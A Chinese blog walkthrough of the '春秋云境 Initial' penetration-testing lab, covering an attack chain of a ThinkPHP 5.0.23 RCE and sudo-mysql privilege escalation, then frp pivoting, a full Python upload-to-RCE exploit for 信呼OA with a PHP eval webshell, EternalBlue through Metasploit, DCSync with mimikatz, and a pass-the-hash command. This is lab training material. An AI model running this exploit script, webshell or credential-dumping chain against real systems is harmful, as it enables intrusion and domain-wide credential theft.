春秋云境Initial-WP(附带详细代理过程)

已于 2023-10-18 09:02:01 修改
阅读量452 收藏 3
点赞数 1
分类专栏: 渗透 文章标签: 安全
于 2023-10-01 13:08:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63576152/article/details/133462469
版权

flag01

给了一个ip

fscan扫一下

./fscan -h 39.99.225.198   #靶机后面重置了一下,所以ip变了

80和22端口开放,识别到thinkphp5.0.23,存在RCE

用Thinkphpgui查找漏洞(一开始因为工具版本问题,一直不能getshell,心疼我的小砂砾),得到木马网址和密码

用蚁剑连接(上马)

进入shell,可以看到当前是www-data用户

查看sudo可执行的命令,发现mysql可以进行免密使用

sudo -l

查找flag

sudo mysql -e '\! find / -name flag*'

获取flag01

sudo mysql -e '\! cat /root/flag/flag01.txt'

flag01:flag{60b53231-

flag02

查看ip

ifconfig

发现172.22.1.0/24内网网段

用蚁剑上传fscan工具到var/www/html

fscan扫描172.22.1.0/24,结果默认保存在同目录下的result.txt中

chmod +x fscan
./fscan -h 172.22.1.0/24

提取出下面的内网信息

172.22.1.2   DC域控
172.22.1.21  MS17-010永恒之蓝
172.22.1.18  信呼OA系统

先来看信呼OA

利用frp和proxifier代理,可以访问到172.22.1.18(frp代理过程在这里

①上传到靶机

②开启frp(服务器端和靶机端都开)

记得要先chmod +x frpc,不然会这样

③开启proxifier

④可以访问到172.22.1.18了,弱密码登录

admin
admin123

漏洞利用参考:[代码审计]信呼协同办公系统2.2存在文件上传配合云处理函数组合拳RCE_信呼2.2.8 漏洞-CSDN博客

exp.py如下

import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

同目录下建立1.php木马

<?php eval($_POST["1"]);?>

执行python3 exp.py,得到文件上传路径

将1.php木马放到靶机中,再将蚁剑加入proxifier代理中

现在能用蚁剑连接信呼OA系统所属的windows了

flag02在C://Users/Administrator/flag/flag02.txt中

2ce3-4813-87d4-

flag03

最后打MS17-010,需要利用proxifier+msf攻击

首先配置一下proxychains(把公网服务器作为代理来进入内网)

vim /etc/proxychains.conf

msfconsole攻击

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

攻击成功后我们会得到一个正向连接的shell(meterpreter)

load kiwi调用mimikatz模块

load kiwi

抓取用户的hash

kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit  # 导出域内所有用户的信息(包括哈希值)

用crackmapexec去进行hash传递攻击,使得我们可以访问到DC上的文件

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

flag03:e8f88d0d43d6}

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

特别鸣谢:gkjzjh146的博客

Jugg_xie
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
春秋云境Initial
龙狼刺的博客
07-15 1854
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。在DCSync技术没有出现之前,攻击者要想拿到域内用户的hash,就只能在域控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash,但是在2015 年 8 月份, Mimkatz新增了一个主要功能叫"DCSync",使用这项技术可以有效地 “模拟” 域控制器并从目标域控上请求域内用户密码hash。
pwnlab-init靶机渗透测试
weixin_49340699的博客
07-14 890
pwnlab-init靶机渗透测试流程 流程 首先信息收集对目标网段进行扫描 netdiscover -i etho -r 192.168.19.0/24 发现目标主机192.168.19.149 用nmap对目标主机端口扫描 nmap -sV 192.168.19.149 开了三个端口 80 111 3306 首先访问80端口 三个页面有上传,登录,和一个啥也没有的home页面上传要求先登录 从登录页面下手 打开登录页面可以看到这个url很敏感 应该是存在文件包含漏洞 先扫一下目录看看有没有发
春秋云境Initial WP
最新发布
m0_62466350的博客
12-05 1056
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)[外链图片转存中…(img-SvBaevSt-1701756474326)]1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)
春秋云镜靶场Initial-WriteUP 专业徽章手把手教学
qq_45234543的博客
11-17 3785
春秋云镜靶场Initial-WP,专业徽章,完整flag获取教程
靶场练习--春秋云境-Certify
NoooEmotion的博客
01-28 1709
Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机
春秋云镜-【仿真场景】Initial writeup
渗透测试研究中心
03-07 1227
开启靶机后是一个带着 ThinkPHP icon 的登陆界面,直接测试一下存在 5.0.23 RCE打一下,PHP-7.4.3 的环境,看一下 disable_functionspcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifco...
initial-setup-0.3.9.45-1.el7.centos.x86_64.rpm
01-07
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
initial-commit:git存储库的入门模板
02-13
初次提交 git存储库的入门模板。 在git环境中创建NPM软件包,静态网站或任何其他存储库时,请使用此选项 用法 克隆此存储库 修改相关文件 推送到您的新存储库位置 利润 支持这个项目 ...麻省理工学院
vuex-entities-plugin-initial-data
04-12
@ dword-design / vuex-entities-plugin-initial-data 安装 # npm $ npm install @dword-design/vuex-entities-plugin-initial-data # Yarn $ yarn add @dword-design/vuex-entities-plugin-initial-data 贡献 您...
initial-deploy
04-13
标题 "initial-deploy" 指的是一个针对GitHub与Vercel平台的初步部署流程或工具。这个工具设计用于在开发过程中快速建立测试部署,帮助开发者便捷地将代码从版本控制系统推送到云托管服务,例如Vercel。Vercel是一个...
initial-CV
03-21
标题“initial-CV”可能指的是一个初步的个人简历或求职信模板,这通常是一个用于展示个人技能、经验、教育背景和个人成就的文档。在IT行业中,这样的简历常常以HTML格式制作,以便在网络上传播和展示,同时也能体现...
【内网渗透】春秋云镜Intitle WP
Sapphire037的博客
04-23 2150
第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私信或评论,接下来会持续更新。
春秋云境系列靶场记录(合集)-不再更新
一只爱吃橙子的羊
11-29 6692
春秋云境系列靶场记录合集,不更新了哈……
春秋云境:CVE-2021-41402(flatCore-CMS v2.0.8 RCE)
m0_65712192的博客
08-22 414
flatCore-CMS v2.0.8 存在后台任意代码执行漏洞
春秋云境靶场CVE-2021-41402漏洞复现(任意代码执行漏洞)
zyh1588的博客
11-17 1364
小白复现CVE-2021-41402漏洞
靶场练习--春秋云境-Tsclient
NoooEmotion的博客
01-28 2186
Tsclient是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机
WP-春秋云境-Tsclient专业徽章通关指南-flag01
qq_45234543的博客
01-04 821
Wp-春秋云镜Tsclient专业徽章Flag01
春秋云境】CVE-2022-32991靶场wp
热门推荐
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
春秋云境.com】网络安全之行-兴趣是起点,实战是归宿
ichunqiu2018的博客
03-16 670
春秋云境.com】访谈:网络安全之行-兴趣是起点,实战是归宿! 让我们一起走进无间计划一血获得者GCOW安全团队小离的实战世界~
initial-scale表示初始缩放比例吗
06-08
是的,`initial-scale`是一个用于设置视口(viewport)初始缩放比例的CSS属性。它的默认值为1.0,表示不进行缩放。如果将`initial-scale`设置为小于1.0的值,页面会被缩小;如果将`initial-scale`设置为大于1.0的值,页面会被放大。 在移动设备上,通常情况下,设备屏幕的像素密度(即DPI)比桌面设备要高。如果不进行缩放,那么在移动设备上,页面上的元素会显得过小,难以阅读和操作。因此,可以使用`initial-scale`来设置初始缩放比例,从而让页面在移动设备上显示得更加合适。 例如: ```html <meta name="viewport" content="width=device-width, initial-scale=1.0"> ``` 在上面的代码中,`initial-scale`被设置为1.0,表示页面不进行缩放,而`width=device-width`表示视口的宽度应该和设备屏幕的宽度一致。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值